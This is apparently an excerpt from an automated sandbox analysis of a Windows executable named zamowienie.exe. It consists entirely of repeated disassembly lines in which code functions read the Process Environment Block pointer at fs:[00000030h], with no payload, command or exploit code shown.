    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFD7E0 mov ecx, dword ptr fs:[00000030h]3_2_34EFD7E0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF57C0 mov eax, dword ptr fs:[00000030h]3_2_34EF57C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF57C0 mov eax, dword ptr fs:[00000030h]3_2_34EF57C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF57C0 mov eax, dword ptr fs:[00000030h]3_2_34EF57C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1D7B0 mov eax, dword ptr fs:[00000030h]3_2_34F1D7B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC37B6 mov eax, dword ptr fs:[00000030h]3_2_34FC37B6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAD7B0 mov eax, dword ptr fs:[00000030h]3_2_34FAD7B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAD7B0 mov eax, dword ptr fs:[00000030h]3_2_34FAD7B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF7BA mov eax, dword ptr fs:[00000030h]3_2_34EEF7BA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7F7AF mov eax, dword ptr fs:[00000030h]3_2_34F7F7AF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7F7AF mov eax, dword ptr fs:[00000030h]3_2_34F7F7AF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7F7AF mov eax, dword ptr fs:[00000030h]3_2_34F7F7AF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7F7AF mov eax, dword ptr fs:[00000030h]3_2_34F7F7AF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7F7AF mov eax, dword ptr fs:[00000030h]3_2_34F7F7AF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F797A9 mov eax, dword ptr fs:[00000030h]3_2_34F797A9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF78A mov eax, dword ptr fs:[00000030h]3_2_34FAF78A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB765 mov eax, dword ptr fs:[00000030h]3_2_34EEB765
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB765 mov eax, dword ptr fs:[00000030h]3_2_34EEB765
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB765 mov eax, dword ptr fs:[00000030h]3_2_34EEB765
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB765 mov eax, dword ptr fs:[00000030h]3_2_34EEB765
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9375F mov eax, dword ptr fs:[00000030h]3_2_34F9375F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9375F mov eax, dword ptr fs:[00000030h]3_2_34F9375F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9375F mov eax, dword ptr fs:[00000030h]3_2_34F9375F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9375F mov eax, dword ptr fs:[00000030h]3_2_34F9375F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9375F mov eax, dword ptr fs:[00000030h]3_2_34F9375F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F03740 mov eax, dword ptr fs:[00000030h]3_2_34F03740
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F03740 mov eax, dword ptr fs:[00000030h]3_2_34F03740
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F03740 mov eax, dword ptr fs:[00000030h]3_2_34F03740
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC3749 mov eax, dword ptr fs:[00000030h]3_2_34FC3749
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCB73C mov eax, dword ptr fs:[00000030h]3_2_34FCB73C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCB73C mov eax, dword ptr fs:[00000030h]3_2_34FCB73C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCB73C mov eax, dword ptr fs:[00000030h]3_2_34FCB73C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCB73C mov eax, dword ptr fs:[00000030h]3_2_34FCB73C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F25734 mov eax, dword ptr fs:[00000030h]3_2_34F25734
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF3720 mov eax, dword ptr fs:[00000030h]3_2_34EF3720
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F720 mov eax, dword ptr fs:[00000030h]3_2_34F0F720
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F720 mov eax, dword ptr fs:[00000030h]3_2_34F0F720
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0F720 mov eax, dword ptr fs:[00000030h]3_2_34F0F720
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB972B mov eax, dword ptr fs:[00000030h]3_2_34FB972B
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF72E mov eax, dword ptr fs:[00000030h]3_2_34FAF72E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF973A mov eax, dword ptr fs:[00000030h]3_2_34EF973A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF973A mov eax, dword ptr fs:[00000030h]3_2_34EF973A
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9730 mov eax, dword ptr fs:[00000030h]3_2_34EE9730
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9730 mov eax, dword ptr fs:[00000030h]3_2_34EE9730
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF7703 mov eax, dword ptr fs:[00000030h]3_2_34EF7703
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF5702 mov eax, dword ptr fs:[00000030h]3_2_34EF5702
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF5702 mov eax, dword ptr fs:[00000030h]3_2_34EF5702
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2F71F mov eax, dword ptr fs:[00000030h]3_2_34F2F71F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2F71F mov eax, dword ptr fs:[00000030h]3_2_34F2F71F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F150E4 mov eax, dword ptr fs:[00000030h]3_2_34F150E4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F150E4 mov ecx, dword ptr fs:[00000030h]3_2_34F150E4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC50D9 mov eax, dword ptr fs:[00000030h]3_2_34FC50D9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F190DB mov eax, dword ptr fs:[00000030h]3_2_34F190DB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov ecx, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov ecx, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov ecx, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov ecx, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F070C0 mov eax, dword ptr fs:[00000030h]3_2_34F070C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F6D0C0 mov eax, dword ptr fs:[00000030h]3_2_34F6D0C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F6D0C0 mov eax, dword ptr fs:[00000030h]3_2_34F6D0C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1D090 mov eax, dword ptr fs:[00000030h]3_2_34F1D090
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1D090 mov eax, dword ptr fs:[00000030h]3_2_34F1D090
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EED08D mov eax, dword ptr fs:[00000030h]3_2_34EED08D
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2909C mov eax, dword ptr fs:[00000030h]3_2_34F2909C
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7D080 mov eax, dword ptr fs:[00000030h]3_2_34F7D080
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7D080 mov eax, dword ptr fs:[00000030h]3_2_34F7D080
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF5096 mov eax, dword ptr fs:[00000030h]3_2_34EF5096
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov ecx, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F01070 mov eax, dword ptr fs:[00000030h]3_2_34F01070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F6D070 mov ecx, dword ptr fs:[00000030h]3_2_34F6D070
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7106E mov eax, dword ptr fs:[00000030h]3_2_34F7106E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC5060 mov eax, dword ptr fs:[00000030h]3_2_34FC5060
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B052 mov eax, dword ptr fs:[00000030h]3_2_34F1B052
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9705E mov ebx, dword ptr fs:[00000030h]3_2_34F9705E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9705E mov eax, dword ptr fs:[00000030h]3_2_34F9705E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB903E mov eax, dword ptr fs:[00000030h]3_2_34FB903E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB903E mov eax, dword ptr fs:[00000030h]3_2_34FB903E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB903E mov eax, dword ptr fs:[00000030h]3_2_34FB903E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB903E mov eax, dword ptr fs:[00000030h]3_2_34FB903E
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F971F9 mov esi, dword ptr fs:[00000030h]3_2_34F971F9
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF51ED mov eax, dword ptr fs:[00000030h]3_2_34EF51ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC31E1 mov eax, dword ptr fs:[00000030h]3_2_34FC31E1
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F151EF mov eax, dword ptr fs:[00000030h]3_2_34F151EF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2D1D0 mov eax, dword ptr fs:[00000030h]3_2_34F2D1D0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2D1D0 mov ecx, dword ptr fs:[00000030h]3_2_34F2D1D0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC51CB mov eax, dword ptr fs:[00000030h]3_2_34FC51CB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0B1B0 mov eax, dword ptr fs:[00000030h]3_2_34F0B1B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA11A4 mov eax, dword ptr fs:[00000030h]3_2_34FA11A4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA11A4 mov eax, dword ptr fs:[00000030h]3_2_34FA11A4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA11A4 mov eax, dword ptr fs:[00000030h]3_2_34FA11A4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA11A4 mov eax, dword ptr fs:[00000030h]3_2_34FA11A4
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F47190 mov eax, dword ptr fs:[00000030h]3_2_34F47190
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA5180 mov eax, dword ptr fs:[00000030h]3_2_34FA5180
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA5180 mov eax, dword ptr fs:[00000030h]3_2_34FA5180
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F89179 mov eax, dword ptr fs:[00000030h]3_2_34F89179
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEF172 mov eax, dword ptr fs:[00000030h]3_2_34EEF172
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9148 mov eax, dword ptr fs:[00000030h]3_2_34EE9148
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9148 mov eax, dword ptr fs:[00000030h]3_2_34EE9148
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9148 mov eax, dword ptr fs:[00000030h]3_2_34EE9148
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE9148 mov eax, dword ptr fs:[00000030h]3_2_34EE9148
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC5152 mov eax, dword ptr fs:[00000030h]3_2_34FC5152
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F83140 mov eax, dword ptr fs:[00000030h]3_2_34F83140
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F83140 mov eax, dword ptr fs:[00000030h]3_2_34F83140
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F83140 mov eax, dword ptr fs:[00000030h]3_2_34F83140
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF7152 mov eax, dword ptr fs:[00000030h]3_2_34EF7152
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB136 mov eax, dword ptr fs:[00000030h]3_2_34EEB136
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB136 mov eax, dword ptr fs:[00000030h]3_2_34EEB136
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB136 mov eax, dword ptr fs:[00000030h]3_2_34EEB136
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB136 mov eax, dword ptr fs:[00000030h]3_2_34EEB136
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC7120 mov eax, dword ptr fs:[00000030h]3_2_34FC7120
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF1131 mov eax, dword ptr fs:[00000030h]3_2_34EF1131
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF1131 mov eax, dword ptr fs:[00000030h]3_2_34EF1131
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FAF2F8 mov eax, dword ptr fs:[00000030h]3_2_34FAF2F8
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B2F0 mov eax, dword ptr fs:[00000030h]3_2_34F9B2F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9B2F0 mov eax, dword ptr fs:[00000030h]3_2_34F9B2F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE92FF mov eax, dword ptr fs:[00000030h]3_2_34EE92FF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA12ED mov eax, dword ptr fs:[00000030h]3_2_34FA12ED
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC52E2 mov eax, dword ptr fs:[00000030h]3_2_34FC52E2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F2D0 mov eax, dword ptr fs:[00000030h]3_2_34F1F2D0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1F2D0 mov eax, dword ptr fs:[00000030h]3_2_34F1F2D0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF92C5 mov eax, dword ptr fs:[00000030h]3_2_34EF92C5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF92C5 mov eax, dword ptr fs:[00000030h]3_2_34EF92C5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F1B2C0 mov eax, dword ptr fs:[00000030h]3_2_34F1B2C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB2D3 mov eax, dword ptr fs:[00000030h]3_2_34EEB2D3
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB2D3 mov eax, dword ptr fs:[00000030h]3_2_34EEB2D3
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EEB2D3 mov eax, dword ptr fs:[00000030h]3_2_34EEB2D3
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F792BC mov eax, dword ptr fs:[00000030h]3_2_34F792BC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F792BC mov eax, dword ptr fs:[00000030h]3_2_34F792BC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F792BC mov ecx, dword ptr fs:[00000030h]3_2_34F792BC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F792BC mov ecx, dword ptr fs:[00000030h]3_2_34F792BC
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F052A0 mov eax, dword ptr fs:[00000030h]3_2_34F052A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F052A0 mov eax, dword ptr fs:[00000030h]3_2_34F052A0
